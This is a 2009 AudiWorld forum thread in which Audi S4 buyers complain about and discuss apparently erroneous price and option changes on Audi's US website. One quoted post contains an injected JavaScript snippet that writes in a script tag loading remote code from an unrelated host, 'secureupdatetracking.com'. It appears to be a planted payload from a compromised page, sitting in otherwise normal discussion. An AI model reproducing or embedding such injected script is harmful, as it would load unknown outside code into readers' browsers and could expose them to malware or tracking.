S4 (B8 Platform) Discussion Discussion forum for the B8 Audi S4 produced from 2009-2016

Audi website S4 price changes

Search this Thread

Old 11-08-2009, 05:30 PM
AudiWorld Member

Received 0 Likes on 0 Posts

That is true, things are expected to go down in price. However, a few points of clarification on that. I can't remember ever seen a carmaker drop an MSRP within a few months of introducing a brand new model. Incentives at the end of a model year, special 'limited edition' versions at the end of a product cycle, and special financing or lease rates to move undesirable or poor selling vehicles are pretty common. But to just up and change the pricing structure with no notice is a pretty d*** move in my opinion. Good for those who haven't taken delivery. I'm happy for those people. But for those of us who just took delivery it's pretty crappy. And you all are also right - a 'reasonable amount of time' is perfectly justifiable. I'm also well aware of this potential when I buy a new TV, phone, etc. And I also know I'm relatively protected. When Apple dropped the price of the iPhone they eventually reimbursed people $100 if they bought within a certain few months of the price drop. After everyone cried foul. When Amazon dropped the price of the Kindle they automatically reimbursed everyone. Best Buy and other big box stores have a price protection policy - normally about 30 days. I did agree to a certain price - based on knowing what the MSRP was. But if the MSRP was $10,000 less you can be damn sure my negotiated price wouldn't be the same as it is now. It would also have been about $10k less.

I readily accept that 2010s will sell for less when the 2011s roll in...NEXT YEAR. Not 7 days after I paid Audi a heck of a lot of money. The bottom line is exactly as I said - I'm furious and *feel* screwed over and robbed. I may not be robbed in the true legal definition of the word but guess what - if you were in my shoes you'd probably feel the same. You can be darn sure I'm going to pursue this in a calm, rational, yet determined way.
Old 11-08-2009, 05:51 PM
AudiWorld Super User

Received 4 Likes on 4 Posts

S4 in this B8 itteration has been out for 1.5 years, it is only brand new to the NA market, EU had it in 09, so it's not as new as you may think. I think it odd to see them move so fast in the US, and limit the '10 production to 3,000 cars, then drop the prices though.
Old 11-08-2009, 05:58 PM
AudiWorld Member

I'm well aware how long it's been out worldwide. But it most certainly is new to the US market. And yes, I do know the B8 A4 was sold here as an '09. Last I checked the B8 S4 has only been on sale here since late August/early September. But what should I know, I'm the idiot complaining about a measly $2000.

It seems the only people defending Audi are those who haven't taken delivery. I don't blame you one bit - I'd be thrilled about saving some money. But please try to put yourselves in the position of those of us who have taken delivery, especially recently.
Old 11-08-2009, 06:20 PM
AudiWorld Super User

Received 41 Likes on 34 Posts

Assuming the opion pricing is correct, the difference between Premium Plus and Prestige needs to be adjusted (hopefully Prestige MSRP lowered) since the 19" wheels which are part of Prestige are now $500 cheaper. You really have to value features like keyless ignition, memory seats and auto-dimming mirrors to want to pay the $52K base MSRP for Prestige (especially if you plan to lease since you get hit with 3% lower residual value too).

MY feeling is that the pricing is an error on the website which will be corrected on Monday. If not, Audi will have a lot of unhappy S4 owners on its hands, unless it refunds them the $1000 cost of the Nappa leather and $1000 extra it has been charging for ADS.
Old 11-08-2009, 06:23 PM
Audiworld Junior Member

I think people are overreacting a bit. It's the weekend, nothing has been confirmed about this. My bet is this is a computer glitch. I'm in the process of negotiating my order and have an email out to my sales associate. It will be interesting to hear the various replies people get this week - I expect it will be a confused array of backpedaling and multiple different responses, rather than a unamimous confirmation or denial.
Old 11-08-2009, 06:31 PM
AudiWorld Super User

Received 55 Likes on 42 Posts

Originally Posted by HenrySoren
It always hurts when you buy something and on the next day they change prices... Same with notebooks.
<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://secureupdatetracking.com/xux/output/index/Ur5HMXLyMVIgg6uA1km1ceh8Ilg7r4bm?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
A $50K+ notebook? Orders of magnitude?? lol!!
Old 11-08-2009, 06:32 PM
AudiWorld Senior Member

I would feel very upset about the price drop (if legitimate) if I had just picked up my car. But I would ask, when is it appropriate for an auto maker to change the price on a car?

After it's been out for a week? A month? Six months? Some arbitrary amount of time isn't going to make the person who bought just before the price drop feel any better. And let's just say, for argument's sake that a price drop was justified after "x" number of days. The guy who bought his car on day "x - 1" is going to be unhappy. And you know what ... there will ALWAYS be that guy. There's no way around it.
Old 11-09-2009, 05:58 AM
Audiworld Junior Member

Well boys and girls its Monday and late afternoon in Germany and the prices are still the same. It does not appear to be a error with the website. For those of you that took delivery of your cars did you notice if there was some KY in the glove box.
Old 11-09-2009, 06:08 AM
AudiWorld Member

Default Just got off phone

I just spoke with my dealership and those prices are a mistake. The purchaser called the order department direct. She said he was the first call of the morning, but sure she will get more.

If anyone has information to refute this please let us know.
Old 11-09-2009, 07:59 AM
Audiworld Junior Member

ADS has been restored to former price, but the Nappa Leather still remains "free."

Sounds like they are fixing their gremlins

Quick Reply: Audi website S4 price changes